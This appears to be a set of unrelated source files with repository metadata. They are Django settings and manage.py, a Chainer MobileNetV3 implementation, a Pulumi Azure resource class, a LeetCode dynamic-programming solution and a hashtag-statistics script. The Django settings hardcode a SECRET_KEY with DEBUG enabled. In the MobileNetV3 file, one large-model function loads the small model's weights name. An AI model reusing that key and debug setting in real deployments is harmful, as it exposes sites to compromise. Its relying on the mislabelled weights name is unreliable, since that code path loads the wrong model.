import os BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) SECRET_KEY = '#v!6idcn2=1^#6s_2x=v*r7ru(^ktkf@rz8#w)jk(_l!po4!yv' DEBUG = True ALLOWED_HOSTS = [] INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'coin', 'crispy_forms', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'trading.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'trading.wsgi.application' DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True STATIC_URL = '/static/' CRISPY_TEMPLATE_PACK = 'bootstrap4' MEDIA_URL = '/media/' MEDIA_ROOT = 'media_files'
[ "sandrobass@hotmail.com" ]
sandrobass@hotmail.com
15c9a8ad3e8f75753d97ea1fff7da9f2912bb9ec
5387c60df3941243b869547e67eebf2b4bf899e4
/restfullmusiccrud/manage.py
de3f5d6c490f265ac2a7ee428fe76d12b0efc9d5
[ "Apache-2.0" ]
permissive
v22kumar/MyTestexcs
9148a433368b9081c0da23ae35f5da16bf6e33c0
392cf8220fa86349f29d1550dfd514dd99b304c8
refs/heads/master
2021-04-12T20:01:48.829192
2020-04-08T06:59:07
2020-04-08T06:59:07
249,106,065
0
0
null
null
null
null
UTF-8
Python
false
false
549
py
#!/usr/bin/env python import os import sys if __name__ == "__main__": os.environ.setdefault("DJANGO_SETTINGS_MODULE", "restfullmusiccrud.settings") try: from django.core.management import execute_from_command_line except ImportError as exc: raise ImportError( "Couldn't import Django. Are you sure it's installed and " "available on your PYTHONPATH environment variable? Did you " "forget to activate a virtual environment?" ) from exc execute_from_command_line(sys.argv)
[ "you@example.com" ]
you@example.com
2e1b85709112fd757467515b49f272c9a5c81781
c7cc93a740664b907e1aec01f908b2aff3e8280c
/chainer_/chainercv2/models/mobilenetv3.py
42fbc2ddeb9c7746290924ef4abe19500e1eb822
[ "MIT" ]
permissive
avinash-chouhan/imgclsmob
9f2e46c9fd4fc0bb542de27e2ae4b9fc347964cc
ff46766065ea7846f8b36701451afc2bf6d667d3
refs/heads/master
2020-06-01T20:56:55.259224
2019-06-08T10:53:51
2019-06-08T10:53:51
null
0
0
null
null
null
null
UTF-8
Python
false
false
18,808
py
""" MobileNetV2, implemented in Chainer. Original paper: 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. """ __all__ = ['MobileNetV3', 'mobilenetv3_small_w7d20', 'mobilenetv3_small_wd2', 'mobilenetv3_small_w3d4', 'mobilenetv3_small_w1', 'mobilenetv3_small_w5d4', 'mobilenetv3_large_w7d20', 'mobilenetv3_large_wd2', 'mobilenetv3_large_w3d4', 'mobilenetv3_large_w1', 'mobilenetv3_large_w5d4'] import os import chainer.functions as F from chainer import Chain from functools import partial from chainer.serializers import load_npz from .common import conv1x1, conv1x1_block, conv3x3_block, dwconv3x3_block, dwconv5x5_block, SEBlock, HSwish,\ SimpleSequential class MobileNetV3Unit(Chain): """ MobileNetV3 unit. Parameters: ---------- in_channels : int Number of input channels. out_channels : int Number of output channels. exp_channels : int Number of middle (expanded) channels. stride : int or tuple/list of 2 int Stride of the second convolution layer. use_kernel3 : bool Whether to use 3x3 (instead of 5x5) kernel. activation : str Activation function or name of activation function. use_se : bool Whether to use SE-module. 
""" def __init__(self, in_channels, out_channels, exp_channels, stride, use_kernel3, activation, use_se): super(MobileNetV3Unit, self).__init__() self.residual = (in_channels == out_channels) and (stride == 1) self.use_se = use_se mid_channels = exp_channels with self.init_scope(): self.conv1 = conv1x1_block( in_channels=in_channels, out_channels=mid_channels, activation=activation) if use_kernel3: self.conv2 = dwconv3x3_block( in_channels=mid_channels, out_channels=mid_channels, stride=stride, activation=activation) else: self.conv2 = dwconv5x5_block( in_channels=mid_channels, out_channels=mid_channels, stride=stride, activation=activation) if self.use_se: self.se = SEBlock( channels=mid_channels, reduction=4, approx_sigmoid=True) self.conv3 = conv1x1_block( in_channels=mid_channels, out_channels=out_channels, activation=None, activate=False) def __call__(self, x): if self.residual: identity = x x = self.conv1(x) x = self.conv2(x) if self.use_se: x = self.se(x) x = self.conv3(x) if self.residual: x = x + identity return x class MobileNetV3FinalBlock(Chain): """ MobileNetV3 final block. Parameters: ---------- in_channels : int Number of input channels. out_channels : int Number of output channels. use_se : bool Whether to use SE-module. """ def __init__(self, in_channels, out_channels, use_se): super(MobileNetV3FinalBlock, self).__init__() self.use_se = use_se with self.init_scope(): self.conv = conv1x1_block( in_channels=in_channels, out_channels=out_channels, activation="hswish") if self.use_se: self.se = SEBlock( channels=out_channels, reduction=4, approx_sigmoid=True) def __call__(self, x): x = self.conv(x) if self.use_se: x = self.se(x) return x class MobileNetV3Classifier(Chain): """ MobileNetV3 classifier. Parameters: ---------- in_channels : int Number of input channels. out_channels : int Number of output channels. mid_channels : int Number of middle channels. 
""" def __init__(self, in_channels, out_channels, mid_channels): super(MobileNetV3Classifier, self).__init__() with self.init_scope(): self.conv1 = conv1x1( in_channels=in_channels, out_channels=mid_channels) self.activ = HSwish() self.conv2 = conv1x1( in_channels=mid_channels, out_channels=out_channels) def __call__(self, x): x = self.conv1(x) x = self.activ(x) x = self.conv2(x) return x class MobileNetV3(Chain): """ MobileNetV2 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- channels : list of list of int Number of output channels for each unit. exp_channels : list of list of int Number of middle (expanded) channels for each unit. init_block_channels : int Number of output channels for the initial unit. final_block_channels : int Number of output channels for the final block of the feature extractor. classifier_mid_channels : int Number of middle channels for classifier. kernels3 : list of list of int/bool Using 3x3 (instead of 5x5) kernel for each unit. use_relu : list of list of int/bool Using ReLU activation flag for each unit. use_se : list of list of int/bool Using SE-block flag for each unit. first_stride : bool Whether to use stride for the first stage. final_use_se : bool Whether to use SE-module in the final block. in_channels : int, default 3 Number of input channels. in_size : tuple of two ints, default (224, 224) Spatial size of the expected input image. classes : int, default 1000 Number of classification classes. 
""" def __init__(self, channels, exp_channels, init_block_channels, final_block_channels, classifier_mid_channels, kernels3, use_relu, use_se, first_stride, final_use_se, in_channels=3, in_size=(224, 224), classes=1000): super(MobileNetV3, self).__init__() self.in_size = in_size self.classes = classes with self.init_scope(): self.features = SimpleSequential() with self.features.init_scope(): setattr(self.features, "init_block", conv3x3_block( in_channels=in_channels, out_channels=init_block_channels, stride=2, activation="hswish")) in_channels = init_block_channels for i, channels_per_stage in enumerate(channels): stage = SimpleSequential() with stage.init_scope(): for j, out_channels in enumerate(channels_per_stage): exp_channels_ij = exp_channels[i][j] stride = 2 if (j == 0) and ((i != 0) or first_stride) else 1 use_kernel3 = kernels3[i][j] == 1 activation = "relu" if use_relu[i][j] == 1 else "hswish" use_se_flag = use_se[i][j] == 1 setattr(stage, "unit{}".format(j + 1), MobileNetV3Unit( in_channels=in_channels, out_channels=out_channels, exp_channels=exp_channels_ij, use_kernel3=use_kernel3, stride=stride, activation=activation, use_se=use_se_flag)) in_channels = out_channels setattr(self.features, "stage{}".format(i + 1), stage) setattr(self.features, 'final_block', MobileNetV3FinalBlock( in_channels=in_channels, out_channels=final_block_channels, use_se=final_use_se)) in_channels = final_block_channels setattr(self.features, 'final_pool', partial( F.average_pooling_2d, ksize=7, stride=1)) self.output = SimpleSequential() with self.output.init_scope(): setattr(self.output, 'final_conv', MobileNetV3Classifier( in_channels=in_channels, out_channels=classes, mid_channels=classifier_mid_channels)) setattr(self.output, 'final_flatten', partial( F.reshape, shape=(-1, classes))) def __call__(self, x): x = self.features(x) x = self.output(x) return x def get_mobilenetv3(version, width_scale, model_name=None, pretrained=False, root=os.path.join("~", ".chainer", 
"models"), **kwargs): """ Create MobileNetV3 model with specific parameters. Parameters: ---------- version : str Version of MobileNetV3 ('small' or 'large'). width_scale : float Scale factor for width of layers. model_name : str or None, default None Model name for loading pretrained model. pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.chainer/models' Location for keeping the model parameters. """ if version == "small": init_block_channels = 16 channels = [[16], [24, 24], [40, 40, 40, 48, 48], [96, 96, 96]] exp_channels = [[16], [72, 88], [96, 240, 240, 120, 144], [288, 576, 576]] kernels3 = [[1], [1, 1], [0, 0, 0, 0, 0], [0, 0, 0]] use_relu = [[1], [1, 1], [0, 0, 0, 0, 0], [0, 0, 0]] use_se = [[1], [0, 0], [1, 1, 1, 1, 1], [1, 1, 1]] first_stride = True final_use_se = True final_block_channels = 576 elif version == "large": init_block_channels = 16 channels = [[16], [24, 24], [40, 40, 40], [80, 80, 80, 80, 112, 112], [160, 160, 160]] exp_channels = [[16], [64, 72], [72, 120, 120], [240, 200, 184, 184, 480, 672], [672, 960, 960]] kernels3 = [[1], [1, 1], [0, 0, 0], [1, 1, 1, 1, 1, 1], [0, 0, 0]] use_relu = [[1], [1, 1], [1, 1, 1], [0, 0, 0, 0, 0, 0], [0, 0, 0]] use_se = [[0], [0, 0], [1, 1, 1], [0, 0, 0, 0, 1, 1], [1, 1, 1]] first_stride = False final_use_se = False final_block_channels = 960 else: raise ValueError("Unsupported MobileNetV3 version {}".format(version)) classifier_mid_channels = 1280 if width_scale != 1.0: channels = [[int(cij * width_scale) for cij in ci] for ci in channels] init_block_channels = int(init_block_channels * width_scale) if width_scale > 1.0: final_block_channels = int(final_block_channels * width_scale) net = MobileNetV3( channels=channels, exp_channels=exp_channels, init_block_channels=init_block_channels, final_block_channels=final_block_channels, classifier_mid_channels=classifier_mid_channels, kernels3=kernels3, use_relu=use_relu, use_se=use_se, 
first_stride=first_stride, final_use_se=final_use_se, **kwargs) if pretrained: if (model_name is None) or (not model_name): raise ValueError("Parameter `model_name` should be properly initialized for loading pretrained model.") from .model_store import get_model_file load_npz( file=get_model_file( model_name=model_name, local_model_store_dir_path=root), obj=net) return net def mobilenetv3_small_w7d20(**kwargs): """ MobileNetV3 Small 224/0.35 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.chainer/models' Location for keeping the model parameters. """ return get_mobilenetv3(version="small", width_scale=0.35, model_name="mobilenetv3_small_w7d20", **kwargs) def mobilenetv3_small_wd2(**kwargs): """ MobileNetV3 Small 224/0.5 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.chainer/models' Location for keeping the model parameters. """ return get_mobilenetv3(version="small", width_scale=0.5, model_name="mobilenetv3_small_wd2", **kwargs) def mobilenetv3_small_w3d4(**kwargs): """ MobileNetV3 Small 224/0.75 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.chainer/models' Location for keeping the model parameters. """ return get_mobilenetv3(version="small", width_scale=0.75, model_name="mobilenetv3_small_w3d4", **kwargs) def mobilenetv3_small_w1(**kwargs): """ MobileNetV3 Small 224/1.0 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. 
root : str, default '~/.chainer/models' Location for keeping the model parameters. """ return get_mobilenetv3(version="small", width_scale=1.0, model_name="mobilenetv3_small_w1", **kwargs) def mobilenetv3_small_w5d4(**kwargs): """ MobileNetV3 Small 224/1.25 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.chainer/models' Location for keeping the model parameters. """ return get_mobilenetv3(version="small", width_scale=1.25, model_name="mobilenetv3_small_w5d4", **kwargs) def mobilenetv3_large_w7d20(**kwargs): """ MobileNetV3 Small 224/0.35 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.chainer/models' Location for keeping the model parameters. """ return get_mobilenetv3(version="large", width_scale=0.35, model_name="mobilenetv3_small_w7d20", **kwargs) def mobilenetv3_large_wd2(**kwargs): """ MobileNetV3 Large 224/0.5 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.chainer/models' Location for keeping the model parameters. """ return get_mobilenetv3(version="large", width_scale=0.5, model_name="mobilenetv3_large_wd2", **kwargs) def mobilenetv3_large_w3d4(**kwargs): """ MobileNetV3 Large 224/0.75 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.chainer/models' Location for keeping the model parameters. 
""" return get_mobilenetv3(version="large", width_scale=0.75, model_name="mobilenetv3_large_w3d4", **kwargs) def mobilenetv3_large_w1(**kwargs): """ MobileNetV3 Large 224/1.0 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.chainer/models' Location for keeping the model parameters. """ return get_mobilenetv3(version="large", width_scale=1.0, model_name="mobilenetv3_large_w1", **kwargs) def mobilenetv3_large_w5d4(**kwargs): """ MobileNetV3 Large 224/1.25 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.chainer/models' Location for keeping the model parameters. """ return get_mobilenetv3(version="large", width_scale=1.25, model_name="mobilenetv3_large_w5d4", **kwargs) def _test(): import numpy as np import chainer chainer.global_config.train = False pretrained = False models = [ mobilenetv3_small_w7d20, mobilenetv3_small_wd2, mobilenetv3_small_w3d4, mobilenetv3_small_w1, mobilenetv3_small_w5d4, mobilenetv3_large_w7d20, mobilenetv3_large_wd2, mobilenetv3_large_w3d4, mobilenetv3_large_w1, mobilenetv3_large_w5d4, ] for model in models: net = model(pretrained=pretrained) weight_count = net.count_params() print("m={}, {}".format(model.__name__, weight_count)) assert (model != mobilenetv3_small_w7d20 or weight_count == 2845419) assert (model != mobilenetv3_small_wd2 or weight_count == 2907518) assert (model != mobilenetv3_small_w3d4 or weight_count == 3006542) assert (model != mobilenetv3_small_w1 or weight_count == 3105566) assert (model != mobilenetv3_small_w5d4 or weight_count == 3499970) assert (model != mobilenetv3_large_w7d20 or weight_count == 4603377) assert (model != mobilenetv3_large_wd2 or weight_count == 4806022) assert (model != mobilenetv3_large_w3d4 or 
weight_count == 5142614) assert (model != mobilenetv3_large_w1 or weight_count == 5479206) assert (model != mobilenetv3_large_w5d4 or weight_count == 6171478) x = np.zeros((1, 3, 224, 224), np.float32) y = net(x) assert (y.shape == (1, 1000)) if __name__ == "__main__": _test()
[ "osemery@gmail.com" ]
osemery@gmail.com
0a6d031e52c377dfeb5f3cf7f389bdc52a2c51d4
9cd180fc7594eb018c41f0bf0b54548741fd33ba
/sdk/python/pulumi_azure_nextgen/network/v20170901/application_security_group.py
ac52e3a85dabe4f471e82c5f7c30605886353ff6
[ "Apache-2.0", "BSD-3-Clause" ]
permissive
MisinformedDNA/pulumi-azure-nextgen
c71971359450d03f13a53645171f621e200fe82d
f0022686b655c2b0744a9f47915aadaa183eed3b
refs/heads/master
2022-12-17T22:27:37.916546
2020-09-28T16:03:59
2020-09-28T16:03:59
null
0
0
null
null
null
null
UTF-8
Python
false
false
8,134
py
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi SDK Generator. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union from ... import _utilities, _tables __all__ = ['ApplicationSecurityGroup'] class ApplicationSecurityGroup(pulumi.CustomResource): def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, application_security_group_name: Optional[pulumi.Input[str]] = None, id: Optional[pulumi.Input[str]] = None, location: Optional[pulumi.Input[str]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, __props__=None, __name__=None, __opts__=None): """ An application security group in a resource group. :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] application_security_group_name: The name of the application security group. :param pulumi.Input[str] id: Resource ID. :param pulumi.Input[str] location: Resource location. :param pulumi.Input[str] resource_group_name: The name of the resource group. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags. 
""" if __name__ is not None: warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning) resource_name = __name__ if __opts__ is not None: warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning) opts = __opts__ if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = dict() if application_security_group_name is None: raise TypeError("Missing required property 'application_security_group_name'") __props__['application_security_group_name'] = application_security_group_name __props__['id'] = id __props__['location'] = location if resource_group_name is None: raise TypeError("Missing required property 'resource_group_name'") __props__['resource_group_name'] = resource_group_name __props__['tags'] = tags __props__['etag'] = None __props__['name'] = None __props__['provisioning_state'] = None __props__['resource_guid'] = None __props__['type'] = None alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/latest:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20171001:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20171101:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20180101:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20180201:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20180401:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20180601:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20180701:ApplicationSecurityGroup"), 
pulumi.Alias(type_="azure-nextgen:network/v20180801:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20181001:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20181101:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20181201:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20190201:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20190401:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20190601:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20190701:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20190801:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20190901:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20191101:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20191201:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20200301:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20200401:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20200501:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20200601:ApplicationSecurityGroup")]) opts = pulumi.ResourceOptions.merge(opts, alias_opts) super(ApplicationSecurityGroup, __self__).__init__( 'azure-nextgen:network/v20170901:ApplicationSecurityGroup', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None) -> 'ApplicationSecurityGroup': """ Get an existing ApplicationSecurityGroup resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. 
""" opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = dict() return ApplicationSecurityGroup(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter def etag(self) -> pulumi.Output[str]: """ A unique read-only string that changes whenever the resource is updated. """ return pulumi.get(self, "etag") @property @pulumi.getter def location(self) -> pulumi.Output[Optional[str]]: """ Resource location. """ return pulumi.get(self, "location") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ Resource name. """ return pulumi.get(self, "name") @property @pulumi.getter(name="provisioningState") def provisioning_state(self) -> pulumi.Output[str]: """ The provisioning state of the application security group resource. Possible values are: 'Succeeded', 'Updating', 'Deleting', and 'Failed'. """ return pulumi.get(self, "provisioning_state") @property @pulumi.getter(name="resourceGuid") def resource_guid(self) -> pulumi.Output[str]: """ The resource GUID property of the application security group resource. It uniquely identifies a resource, even if the user changes its name or migrate the resource across subscriptions or resource groups. """ return pulumi.get(self, "resource_guid") @property @pulumi.getter def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]: """ Resource tags. """ return pulumi.get(self, "tags") @property @pulumi.getter def type(self) -> pulumi.Output[str]: """ Resource type. """ return pulumi.get(self, "type") def translate_output_property(self, prop): return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self, prop): return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
[ "public@paulstack.co.uk" ]
public@paulstack.co.uk
e89f4fa1910b5e1ead9f3d1bcd08b5811ee1944a
5a8214b3a452c574e6c883bf5d90ba58ba87c461
/leetcode/1140.stone-game-ii.py
abbfd17a569afa2a85d2de22865c2faaa350ab43
[]
no_license
phlalx/algorithms
69a3c8519687816e3c6333ec12b40659d3e3167f
f4da5a5dbda640b9bcbe14cb60a72c422b5d6240
refs/heads/master
2023-02-03T10:30:30.181735
2020-12-26T09:47:38
2020-12-26T09:47:38
129,254,618
0
0
null
null
null
null
UTF-8
Python
false
false
2,129
py
# # @lc app=leetcode id=1140 lang=python3 # # [1140] Stone Game II # # https://leetcode.com/problems/stone-game-ii/description/ # # algorithms # Medium (62.00%) # Likes: 335 # Dislikes: 75 # Total Accepted: 11.4K # Total Submissions: 18.4K # Testcase Example: '[2,7,9,4,4]' # # Alex and Lee continue their games with piles of stones.  There are a number # of piles arranged in a row, and each pile has a positive integer number of # stones piles[i].  The objective of the game is to end with the most stones.  # # Alex and Lee take turns, with Alex starting first.  Initially, M = 1. # # On each player's turn, that player can take all the stones in the first X # remaining piles, where 1 <= X <= 2M.  Then, we set M = max(M, X). # # The game continues until all the stones have been taken. # # Assuming Alex and Lee play optimally, return the maximum number of stones # Alex can get. # # # Example 1: # # # Input: piles = [2,7,9,4,4] # Output: 10 # Explanation: If Alex takes one pile at the beginning, Lee takes two piles, # then Alex takes 2 piles again. Alex can get 2 + 4 + 4 = 10 piles in total. If # Alex takes two piles at the beginning, then Lee can take all three piles # left. In this case, Alex get 2 + 7 = 9 piles in total. So we return 10 since # it's larger. # # # # Constraints: # # # 1 <= piles.length <= 100 # 1 <= piles[i] <= 10 ^ 4 # # # TAGS dp # very classic dp # @lc code=start import functools class Solution: def stoneGameII(self, piles: List[int]) -> int: total = sum(piles) n = len(piles) @functools.lru_cache(maxsize=None) def f(i, M) -> int: # return best score achievable by player if i == n: return 0 else: best = float('-inf') cur_sum = 0 # last pile taken by player for x in range(i, min(i + 2 * M, n)): cur_sum += piles[x] best = max(best, cur_sum - f(x+1, max(M, x-i+1))) return best score = f(0, 1) return (total + score) // 2 # @lc code=end
[ "phlalx@users.noreply.github.com" ]
phlalx@users.noreply.github.com
c1b22849629d6c3615ebfb29f802a866b205482b
3b79a802f8dd9f26bee0bfde4630ac0cab932803
/srcHashTag/statisticHashtag.py
11eb49bb3a43550f017598f6d4cfd9ad00cbd48b
[]
no_license
qolina/Twevent
87fc4706564088361e9db6ddc44efc10647e67fe
4b90b0604493b20dee90448c17e0a8e0d557165e
refs/heads/master
2021-06-24T19:06:02.022882
2017-08-15T05:20:09
2017-08-15T05:20:09
100,341,172
1
0
null
null
null
null
UTF-8
Python
false
false
5,044
py
#! /usr/bin/env python #coding=utf-8 import time import re import os import math import cPickle ############################ ## load tweets' social feature def loadsocialfeature(filepath): inFile = file(filepath,"r") tweSFHash = cPickle.load(inFile) inFile.close() print "### " + str(time.asctime()) + " " + str(len(tweSFHash)) + " tweets' social features are loaded from " + inFile.name return tweSFHash ''' feahash["RT"] = RT feahash["Men"] = Men feahash["Reply"] = Reply feahash["Url"] = Url feahash["RTC"] = RTC feahash["Fav"] = Fav feahash["Tag"] = Tag feahash["Past"] = Past ''' ############################ ## def statisticHashtag(dataFilePath, toolDirPath): fileList = os.listdir(dataFilePath) # output hashtag statistics hashtagfreqFile = file(toolDirPath + "hashTagFreqFile", "w") hashtagFile = file(toolDirPath + "hashTagFile", "w") hashtagByTFFile = file(toolDirPath + "hashTagTFFile", "w") hashtagByDFFile = file(toolDirPath + "hashTagDFFile", "w") hashTagHashAppHash = {} tweetTagHash = {} for item in sorted(fileList): if item.find("segged") != 0: continue tStr = item[len(item)-2:len(item)] print "Time window: " + tStr tweetSocialFeatureFilePath = toolDirPath + "tweetSocialFeature" + tStr tweSFHash = loadsocialfeature(tweetSocialFeatureFilePath) tagHash = dict([(tid, tweSFHash[tid]["Tag"]) for tid in tweSFHash if len(tweSFHash[tid]["Tag"]) > 1]) tweetTagHash.update(tagHash) print "### " + str(time.asctime()) + " " + str(len(tagHash)) + " tweets contain hashtags" tweSFHash.clear() for tid in tagHash: tagStr = tagHash[tid] tagArr = tagStr.split(" ") for tag in tagArr: illegelLetter = False for letter in tag: encodeNum = ord(letter) if (encodeNum < 32) | (encodeNum > 126): illegelLetter = True break # if re.match("[a-zA-Z0-9]", letter): # puncOnly = False if illegelLetter: #contain illegel letter continue apphash = {} if tag in hashTagHashAppHash: apphash = hashTagHashAppHash[tag] if tid in apphash: apphash[tid] += 1 else: apphash[tid] = 1 hashTagHashAppHash[tag] = 
apphash # print tag + " " + str(apphash) print "### " + str(len(hashTagHashAppHash)) + " hashtags are loaded already." print "### " + str(time.asctime()) + " " + str(len(hashTagHashAppHash)) + " hashtag are loaded." print "### " + str(time.asctime()) + " " + str(len(tweetTagHash)) + " tweets contain hashtags." cPickle.dump(hashTagHashAppHash, hashtagfreqFile) hashtagList = hashTagHashAppHash.keys() sortedByTF = {} sortedByDF = {} tagLenHash = {} for tag in sorted(hashtagList): apphash = hashTagHashAppHash[tag] df = len(apphash) tf = sum(apphash.values()) sortedByTF[tag] = tf sortedByDF[tag] = df hashtagFile.write(tag + "\t" + str(tf) + "\t" + str(df) + "\n") tagLen = len(tag) if tagLen in tagLenHash: tagLenHash[tagLen] += 1 else: tagLenHash[tagLen] = 1 print "### " + str(sum(tagLenHash.values())) + " hash tags, length distribution: " print sorted(tagLenHash.items(), key = lambda a:a[1], reverse = True) for tagItem in sorted(sortedByTF.items(), key = lambda a:a[1], reverse = True): tag = tagItem[0] tf = tagItem[1] df = sortedByDF[tag] hashtagByTFFile.write(tag + "\t" + str(tf) + "\t" + str(df) + "\n") for tagItem in sorted(sortedByDF.items(), key = lambda a:a[1], reverse = True): tag = tagItem[0] df = tagItem[1] tf = sortedByTF[tag] hashtagByDFFile.write(tag + "\t" + str(tf) + "\t" + str(df) + "\n") hashtagFile.close() hashtagByTFFile.close() hashtagByDFFile.close() hashtagfreqFile.close() print "### " + str(time.asctime()) + " hashtag statistics (alpha order) are stored into " + hashtagFile.name print "### " + str(time.asctime()) + " hashtag statistics (tf) are stored into " + hashtagByTFFile.name print "### " + str(time.asctime()) + " hashtag statistics (df) are stored into " + hashtagByDFFile.name print "### " + str(time.asctime()) + " hashtag statistics (dump) are stored into " + hashtagfreqFile.name ############################ ## main Function print "###program starts at " + str(time.asctime()) dataFilePath = r"../Data_hfmon/segged_ltwe/" toolDirPath = 
r"../Tools/" statisticHashtag(dataFilePath, toolDirPath) print "###program ends at " + str(time.asctime())
[ "qolina@gmail.com" ]
qolina@gmail.com
7efa918f1bb495b80442d7de7a5651b98bfc7627
6437a3a4a31ab9ad233d6b2d985beb50ed50de23
/PythonistaAppTemplate/PythonistaKit.framework/pylib_ext/sympy/functions/elementary/miscellaneous.py
9f57f5abdd1fb7364e12d77da04ab50572d84e26
[]
no_license
sreyemnayr/jss-lost-mode-app
03ddc472decde3c17a11294d8ee48b02f83b71e7
3ff4ba6fb13f4f3a4a98bfc824eace137f6aabaa
refs/heads/master
2021-05-02T08:50:10.580091
2018-02-08T20:32:29
2018-02-08T20:32:29
120,813,623
1
0
null
null
null
null
UTF-8
Python
false
false
23,913
py
